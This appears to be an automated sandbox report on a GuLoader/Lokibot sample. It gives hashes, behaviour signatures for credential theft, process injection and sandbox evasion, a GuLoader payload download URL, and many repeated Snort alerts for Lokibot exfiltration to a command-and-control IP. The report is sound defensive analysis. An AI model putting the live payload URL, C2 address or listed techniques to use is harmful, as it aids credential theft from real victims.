Windows Analysis Report 2GirCpksIO.exe

Overview

General Information

Sample Name: 2GirCpksIO.exe
Analysis ID: 526365
MD5: 5cc619f7dd365ec061f1f385d25bea30
SHA1: 5b28cb97973da18953fb284648f13257f0aba2f3
SHA256: 7f5124088c09a925ad3a162b4e56391557dfc7d9950b9a55044036698d369d13
Detection

Threat: GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Lokibot
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64native
  • 2GirCpksIO.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\2GirCpksIO.exe" MD5: 5CC619F7DD365EC061F1F385D25BEA30)
    • 2GirCpksIO.exe (PID: 4560 cmdline: "C:\Users\user\Desktop\2GirCpksIO.exe" MD5: 5CC619F7DD365EC061F1F385D25BEA30)
      • lsass.exe (PID: 1016 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
  • UserOOBEBroker.exe (PID: 4236 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://afrocompass.com/karinedocesesalgados_Hpi"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Process Memory Space: 2GirCpksIO.exe PID: 4560 | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

          Sigma Overview

          System Summary:

          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process started, Author: vburov: Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\2GirCpksIO.exe" , ParentImage: C:\Users\user\Desktop\2GirCpksIO.exe, ParentProcessId: 4560, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 1016

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://afrocompass.com/karinedocesesalgados_Hpi"}
          Multi AV Scanner detection for submitted file
          Source: 2GirCpksIO.exe, Virustotal: Detection: 32%
          Source: 2GirCpksIO.exe, ReversingLabs: Detection: 20%
          Multi AV Scanner detection for domain / URL
          Source: karinedocesesalgados.com.br, Virustotal: Detection: 7%
          Source: 2GirCpksIO.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknown, HTTPS traffic detected: 68.66.226.70:443 -> 192.168.11.20:49787 version: TLS 1.2

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49788 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49788 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49788 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49788 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49789 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49789 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49790 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49790 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49790 -> 192.185.217.246:80
          Source: Traffic, Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49790 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49843 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49887 -> 192.185.217.246:80
